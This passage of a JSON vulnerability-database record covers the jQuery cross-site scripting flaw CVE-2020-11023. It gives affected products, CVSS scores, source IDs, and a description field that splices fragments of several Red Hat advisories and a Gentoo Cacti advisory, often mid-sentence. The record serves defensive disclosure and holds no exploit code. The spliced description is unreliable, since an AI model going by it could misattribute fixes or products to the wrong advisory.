"vendor": "oracle",
"version": "2.3.1"
},
{
"_id": null,
"model": "communications services gatekeeper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "snapcenter server",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "8.8.0"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "application testing suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.1"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "8.8.6"
},
{
"_id": null,
"model": "blockchain platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.1.2"
},
{
"_id": null,
"model": "communications operations monitor",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "4.1"
},
{
"_id": null,
"model": "banking enterprise collections",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.7.0"
},
{
"_id": null,
"model": "max data",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.9"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "31"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "application express",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "20.2"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications interactive session recorder",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "6.4"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-11023"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "171211"
},
{
"db": "PACKETSTORM",
"id": "170821"
},
{
"db": "PACKETSTORM",
"id": "170819"
},
{
"db": "PACKETSTORM",
"id": "170817"
},
{
"db": "PACKETSTORM",
"id": "168304"
},
{
"db": "PACKETSTORM",
"id": "159513"
},
{
"db": "PACKETSTORM",
"id": "158797"
}
],
"trust": 0.9
},
"cve": "CVE-2020-11023",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2020-11023",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-163560",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2020-11023",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "NONE",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.6,
"id": "CVE-2020-11023",
"impactScore": 4.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-11023",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2020-11023",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-163560",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163560"
},
{
"db": "NVD",
"id": "CVE-2020-11023"
},
{
"db": "NVD",
"id": "CVE-2020-11023"
}
]
},
"description": {
"_id": null,
"data": "In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing \u003coption\u003e elements from untrusted sources - even after sanitizing it - to one of jQuery\u0027s DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. A cross-site scripting vulnerability exists in jQuery versions 1.0.3 through 3.5.0. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe Public Key Infrastructure (PKI) Core contains fundamental packages\nrequired by Red Hat Certificate System. Bugs fixed (https://bugzilla.redhat.com/):\n\n1376706 - restore SerialNumber tag in caManualRenewal xml\n1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests\n1406505 - KRA ECC installation failed with shared tomcat\n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip\n1666907 - CC: Enable AIA OCSP cert checking for entire cert chain\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1695901 - CVE-2019-10179 pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA\u0027s DRM agent page in authorize recovery tab\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object\u0027s prototype leading to denial of service, remote code execution, or property injection\n1706521 - CA - SubjectAltNameExtInput does not display text fields to the enrollment page\n1710171 - CVE-2019-10146 pki-core: Reflected XSS in \u0027path length\u0027 constraint field in CA\u0027s Agent page\n1721684 - Rebase pki-servlet-engine to 9.0.30\n1724433 - caTransportCert.cfg contains MD2/MD5withRSA as signingAlgsAllowed. \n1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA\n1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped. \n1777579 - CVE-2020-1721 pki-core: KRA vulnerable to reflected XSS via the getPk12 page\n1805541 - [RFE] CA Certificate Transparency with Embedded Signed Certificate Time stamp\n1817247 - Upgrade to 10.8.3 breaks PKI Tomcat Server\n1821851 - [RFE] Provide SSLEngine via JSSProvider for use with PKI\n1822246 - JSS - NativeProxy never calls releaseNativeResources - Memory Leak\n1824939 - JSS: add RSA PSS support - RHEL 8.3\n1824948 - add RSA PSS support - RHEL 8.3\n1825998 - CertificatePoliciesExtDefault MAX_NUM_POLICIES hardcoded limit\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1842734 - CVE-2019-10179 pki-core: pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA\u0027s DRM agent page in authorize recovery tab [rhel-8]\n1842736 - CVE-2019-10146 pki-core: Reflected Cross-Site Scripting in \u0027path length\u0027 constraint field in CA\u0027s Agent page [rhel-8]\n1843537 - Able to Perform PKI CLI operations like cert request and approval without nssdb password\n1845447 - pkispawn fails in FIPS mode: AJP connector has secretRequired=\"true\" but no secret\n1850004 - CVE-2020-11023 jquery: Passing HTML containing \u003coption\u003e elements to manipulation methods could result in untrusted code execution\n1854043 - /usr/bin/PrettyPrintCert is failing with a ClassNotFoundException\n1854959 - ca-profile-add with Netscape extensions nsCertSSLClient and nsCertEmail in the profile gets stuck in processing\n1855273 - CVE-2020-15720 pki: Dogtag\u0027s python client does not validate certificates\n1855319 - Not able to launch pkiconsole\n1856368 - kra-key-generate request is failing\n1857933 - CA Installation is failing with ncipher v12.30 HSM\n1861911 - pki cli ca-cert-request-approve hangs over crmf request from client-cert-request\n1869893 - Common certificates are missing in CS.cfg on shared PKI instance\n1871064 - replica install failing during pki-ca component configuration\n1873235 - pki ca-user-cert-add with secure port failed with \u0027SSL_ERROR_INAPPROPRIATE_FALLBACK_ALERT\u0027\n\n6. Description:\n\nRed Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001\nJBEAP-23865 - [GSS](7.4.z) Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001\nJBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001\nJBEAP-23928 - Tracker bug for the EAP 7.4.9 release for RHEL-9\nJBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001\nJBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001\nJBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001\nJBEAP-24100 - [GSS](7.4.z) Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001\nJBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value\nJBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001\nJBEAP-24132 - [GSS](7.4.z) Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001\nJBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001\nJBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002\nJBEAP-24191 - [GSS](7.4.z) Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001\nJBEAP-24195 - [GSS](7.4.z) Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001\nJBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003\nJBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2\nJBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001\nJBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001\n\n7. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: RHV Manager (ovirt-engine) [ovirt-4.5.2] bug fix and security update\nAdvisory ID: RHSA-2022:6393-01\nProduct: Red Hat Virtualization\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:6393\nIssue date: 2022-09-08\nCVE Names: CVE-2020-11022 CVE-2020-11023 CVE-2021-22096\n CVE-2021-23358 CVE-2022-2806 CVE-2022-31129\n====================================================================\n1. Summary:\n\nUpdated ovirt-engine packages that fix several bugs and add various\nenhancements are now available. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4 - noarch\n\n3. Description:\n\nThe ovirt-engine package provides the Red Hat Virtualization Manager, a\ncentralized management platform that allows system administrators to view\nand manage virtual machines. The Manager provides a comprehensive range of\nfeatures including search capabilities, resource management, live\nmigrations, and virtual infrastructure provisioning. \n\nSecurity Fix(es):\n\n* nodejs-underscore: Arbitrary code execution via the template function\n(CVE-2021-23358)\n\n* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)\n\n* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter\nmethod (CVE-2020-11022)\n\n* jquery: Untrusted code execution via \u003coption\u003e tag in HTML passed to DOM\nmanipulation methods (CVE-2020-11023)\n\n* ovirt-log-collector: RHVM admin password is logged unfiltered\n(CVE-2022-2806)\n\n* springframework: malicious input leads to insertion of additional log\nentries (CVE-2021-22096)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* Previously, running engine-setup did not always renew OVN certificates\nclose to expiration or expired. With this release, OVN certificates are\nalways renewed by engine-setup when needed. (BZ#2097558)\n\n* Previously, the Manager issued warnings of approaching certificate\nexpiration before engine-setup could update certificates. In this release\nexpiration warnings and certificate update periods are aligned, and\ncertificates are updated as soon as expiration warnings occur. (BZ#2097725)\n\n* With this release, OVA export or import work on hosts with a non-standard\nSSH port. (BZ#2104939)\n\n* With this release, the certificate validity test is compatible with RHEL\n8 and RHEL 7 based hypervisors. (BZ#2107250)\n\n* RHV 4.4 SP1 and later are only supported on RHEL 8.6, customers cannot\nuse RHEL 8.7 or later, and must stay with RHEL 8.6 EUS. (BZ#2108985)\n\n* Previously, importing templates from the Administration Portal did not\nwork. With this release, importing templates from the Administration Portal\nis possible. (BZ#2109923)\n\n* ovirt-provider-ovn certificate expiration is checked along with other RHV\ncertificates. If ovirt-provider-ovn is about to expire or already expired,\na warning or alert is raised in the audit log. To renew the\novirt-provider-ovn certificate, administators must run engine-setup. If\nyour ovirt-provider-ovn certificate expires on a previous RHV version,\nupgrade to RHV 4.4 SP1 batch 2 or later, and ovirt-provider-ovn certificate\nwill be renewed automatically in the engine-setup. (BZ#2097560)\n\n* Previously, when importing a virtual machine with manual CPU pinning, the\nmanual pinning string was cleared, but the CPU pinning policy was not set\nto NONE. As a result, importing failed. In this release, the CPU pinning\npolicy is set to NONE if the CPU pinning string is cleared, and importing\nsucceeds. (BZ#2104115)\n\n* Previously, the Manager could start a virtual machine with a Resize and\nPin NUMA policy on a host without an equal number of physical sockets to\nNUMA nodes. As a result, wrong pinning was assigned to the policy. With\nthis release, the Manager does not allow the virtual machine to be\nscheduled on such a virtual machine, and the pinning is correct based on\nthe algorithm. (BZ#1955388)\n\n* Rebase package(s) to version: 4.4.7. \nHighlights, important fixes, or notable enhancements: fixed BZ#2081676\n(BZ#2104831)\n\n* In this release, rhv-log-collector-analyzer provides detailed output for\neach problematic image, including disk names, associated virtual machine,\nthe host running the virtual machine, snapshots, and current SPM. The\ndetailed view is now the default. The compact option can be set by using\nthe --compact switch in the command line. (BZ#2097536)\n\n* UnboundID LDAP SDK has been rebased on upstream version 6.0.4. See\nhttps://github.com/pingidentity/ldapsdk/releases for changes since version\n4.0.14 (BZ#2092478)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891\n\n5. \n1944286 - CVE-2021-23358 nodejs-underscore: Arbitrary code execution via the template function\n1955388 - Auto Pinning Policy only pins some of the vCPUs on a single NUMA host\n1974974 - Not possible to determine migration policy from the API, even though documentation reports that it can be done. \n2034584 - CVE-2021-22096 springframework: malicious input leads to insertion of additional log entries\n2080005 - CVE-2022-2806 ovirt-log-collector: RHVM admin password is logged unfiltered\n2092478 - Upgrade unboundid-ldapsdk to 6.0.4\n2094577 - rhv-image-discrepancies must ignore small disks created by OCP\n2097536 - [RFE] Add disk name and uuid to problems output\n2097558 - Renew ovirt-provider-ovn.cer certificates during engine-setup\n2097560 - Warning when ovsdb-server certificates are about to expire(OVN certificate)\n2097725 - Certificate Warn period and automatic renewal via engine-setup do not match\n2104115 - RHV 4.5 cannot import VMs with cpu pinning\n2104831 - Upgrade ovirt-log-collector to 4.4.7\n2104939 - Export OVA when using host with port other than 22\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n2107250 - Upgrade of the host failed as the RHV 4.3 hypervisor is based on RHEL 7 with openssl 1.0.z, but RHV Manager 4.4 uses the openssl 1.1.z syntax\n2107267 - ovirt-log-collector doesn\u0027t generate database dump\n2108985 - RHV 4.4 SP1 EUS requires RHEL 8.6 EUS (RHEL 8.7+ releases are not supported on RHV 4.4 SP1 EUS)\n2109923 - Error when importing templates in Admin portal\n\n6. Package List:\n\nRHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4:\n\nSource:\novirt-engine-4.5.2.4-0.1.el8ev.src.rpm\novirt-engine-dwh-4.5.4-1.el8ev.src.rpm\novirt-engine-extension-aaa-ldap-1.4.6-1.el8ev.src.rpm\novirt-engine-ui-extensions-1.3.5-1.el8ev.src.rpm\novirt-log-collector-4.4.7-2.el8ev.src.rpm\novirt-web-ui-1.9.1-1.el8ev.src.rpm\nrhv-log-collector-analyzer-1.0.15-1.el8ev.src.rpm\nunboundid-ldapsdk-6.0.4-1.el8ev.src.rpm\nvdsm-jsonrpc-java-1.7.2-1.el8ev.src.rpm\n\nnoarch:\novirt-engine-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-backend-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-dbscripts-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-dwh-4.5.4-1.el8ev.noarch.rpm\novirt-engine-dwh-grafana-integration-setup-4.5.4-1.el8ev.noarch.rpm\novirt-engine-dwh-setup-4.5.4-1.el8ev.noarch.rpm\novirt-engine-extension-aaa-ldap-1.4.6-1.el8ev.noarch.rpm\novirt-engine-extension-aaa-ldap-setup-1.4.6-1.el8ev.noarch.rpm\novirt-engine-health-check-bundler-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-restapi-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-base-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-plugin-cinderlib-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-plugin-imageio-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-plugin-ovirt-engine-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-plugin-ovirt-engine-common-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-plugin-vmconsole-proxy-helper-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-plugin-websocket-proxy-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-tools-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-tools-backup-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-ui-extensions-1.3.5-1.el8ev.noarch.rpm\novirt-engine-vmconsole-proxy-helper-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-webadmin-portal-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-websocket-proxy-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-log-collector-4.4.7-2.el8ev.noarch.rpm\novirt-web-ui-1.9.1-1.el8ev.noarch.rpm\npython3-ovirt-engine-lib-4.5.2.4-0.1.el8ev.noarch.rpm\nrhv-log-collector-analyzer-1.0.15-1.el8ev.noarch.rpm\nrhvm-4.5.2.4-0.1.el8ev.noarch.rpm\nunboundid-ldapsdk-6.0.4-1.el8ev.noarch.rpm\nunboundid-ldapsdk-javadoc-6.0.4-1.el8ev.noarch.rpm\nvdsm-jsonrpc-java-1.7.2-1.el8ev.noarch.rpm\nvdsm-jsonrpc-java-javadoc-1.7.2-1.el8ev.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-11022\nhttps://access.redhat.com/security/cve/CVE-2020-11023\nhttps://access.redhat.com/security/cve/CVE-2021-22096\nhttps://access.redhat.com/security/cve/CVE-2021-23358\nhttps://access.redhat.com/security/cve/CVE-2022-2806\nhttps://access.redhat.com/security/cve/CVE-2022-31129\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYxnqRtzjgjWX9erEAQiQOw//XOS172gkbNeuoMSW1IYiEpJG4zQIvT2J\nVvyizOMlQzpe49Bkopu1zj/e8yM1eXNIg1elPzA3280z7ruNb4fkeoXT7vM5mB/0\njRAr1ja9ZHnZmEW60X3WVhEBjEXCeOv5CWBgqzdQWSB7RpPqfMP7/4kHGFnCPZxu\nV/n+Z9YKoDxeiW19tuTdU5E5cFySVV8JZAlfXlrR1dz815Ugsm2AMk6uPwjQ2+C7\nUz3zLQLjRjxFk+qSph8NYbOZGnUkypWQG5KXPMyk/Cg3jewjMkjAhzgcTJAdolRC\nq3p9kD5KdWRe+3xzjy6B4IsSSqvEyHphwrRv8wgk0vIAawfgi76+jL7n/C07rdpA\nQg6zlDxmHDrZPC42dsW6dXJ1QefRQE5EzFFJcoycqvWdlRfXX6D1RZc5knSQb2iI\n3iSh+hVwxY9pzNZVMlwtDHhw8dqvgw7JimToy8vOldgK0MdndwtVmKsKsRzu7HyL\nPQSvcN5lSv1X5FR2tnx9LMQXX1qn0P1d/8gTiRFm8Oabjx2r8I0/HNgnJpTSVSBO\nDXjKFDmwpiT+6tupM39ZbWek2hh+PoyMZJb/d6/YTND6VNlzUypq+DFtLILEaM8Z\nOjWz0YAL8/ihvhq0vSdFSMFcYKSWAOXA+6pSqe7N7WtB9hl0r7sLUaRSRHti1Ime\nuF/GLDTKkPw=8zTJ\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202007-03\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/ \u003chttps://security.gentoo.org/\u003e\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Cacti: Multiple vulnerabilities\n Date: July 26, 2020\n Bugs: #728678, #732522\n ID: 202007-03\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Cacti, the worst of which\ncould result in the arbitrary execution of code. \n\nBackground\n==========\n\nCacti is a complete frontend to rrdtool. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-analyzer/cacti \u003c 1.2.13 \u003e= 1.2.13\n 2 net-analyzer/cacti-spine\n \u003c 1.2.13 \u003e= 1.2.13\n -------------------------------------------------------------------\n 2 affected packages\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Cacti. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Cacti users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-analyzer/cacti-1.2.13\"\n\nAll Cacti Spine users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=net-analyzer/cacti-spine-1.2.13\"\n\nReferences\n==========\n\n[ 1 ] CVE-2020-11022\n https://nvd.nist.gov/vuln/detail/CVE-2020-11022 \u003chttps://nvd.nist.gov/vuln/detail/CVE-2020-11022\u003e\n[ 2 ] CVE-2020-11023\n https://nvd.nist.gov/vuln/detail/CVE-2020-11023 \u003chttps://nvd.nist.gov/vuln/detail/CVE-2020-11023\u003e\n[ 3 ] CVE-2020-14295\n https://nvd.nist.gov/vuln/detail/CVE-2020-14295 \u003chttps://nvd.nist.gov/vuln/detail/CVE-2020-14295\u003e\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202007-03 \u003chttps://security.gentoo.org/glsa/202007-03\u003e\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org \u003cmailto:security@gentoo.org\u003e or alternatively, you may file a bug at\nhttps://bugs.gentoo.org \u003chttps://bugs.gentoo.org/\u003e. \n\nLicense\n=======\n\nCopyright 2020 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5 \u003chttps://creativecommons.org/licenses/by-sa/2.5\u003e\n\n. Relevant releases/architectures:\n\n6ComputeNode-RH6-A-MQ-Interconnect-1 - noarch, x86_64\n6Server-RH6-A-MQ-Interconnect-1 - i386, noarch, x86_64\n6Workstation-RH6-A-MQ-Interconnect-1 - i386, noarch, x86_64\n7ComputeNode-RH7-A-MQ-Interconnect-1 - noarch, x86_64\n7Server-RH7-A-MQ-Interconnect-1 - noarch, x86_64\n7Workstation-RH7-A-MQ-Interconnect-1 - noarch, x86_64\n8Base-A-MQ-Interconnect-1 - noarch, x86_64\n\n3. AMQ\nInterconnect provides flexible routing of messages between AMQP-enabled\nendpoints, whether they are clients, servers, brokers, or any other entity\nthat can send or receive standard AMQP messages. For further information, refer to the release notes linked\nto in the References section. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):\n\nENTMQIC-2448 - Allow specifying address/source/target to be used for a multitenant listener\nENTMQIC-2455 - Allow AMQP open properties to be supplemented from connector configuration\nENTMQIC-2460 - Adding new config address, autolinks and link routes become slower as more get added\nENTMQIC-2481 - Unable to delete listener with http enabled\nENTMQIC-2485 - The VhostNamePatterns does not work in OCP env\nENTMQIC-2492 - router drops TransactionalState on produced messages on link routes\n\n7. Description:\n\nRed Hat OpenShift Service Mesh is Red Hat\u0027s distribution of the Istio\nservice mesh project, tailored for installation into an on-premise\nOpenShift Container Platform installation",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-11023"
},
{
"db": "VULHUB",
"id": "VHN-163560"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "171211"
},
{
"db": "PACKETSTORM",
"id": "170821"
},
{
"db": "PACKETSTORM",
"id": "170819"
},
{
"db": "PACKETSTORM",
"id": "170817"
},
{
"db": "PACKETSTORM",
"id": "168304"
},
{
"db": "PACKETSTORM",
"id": "158555"
},
{
"db": "PACKETSTORM",
"id": "159513"
},
{
"db": "PACKETSTORM",
"id": "158797"
}
],
"trust": 1.89
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-11023",
"trust": 2.1
},
{
"db": "PACKETSTORM",
"id": "162160",
"trust": 1.1
},
{
"db": "TENABLE",
"id": "TNS-2021-02",
"trust": 1.1
},
{
"db": "TENABLE",
"id": "TNS-2021-10",
"trust": 1.1
},
{
"db": "PACKETSTORM",
"id": "171212",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159852",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170821",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "158797",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "168304",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170819",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170817",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159513",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "158555",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "171213",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170823",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162651",
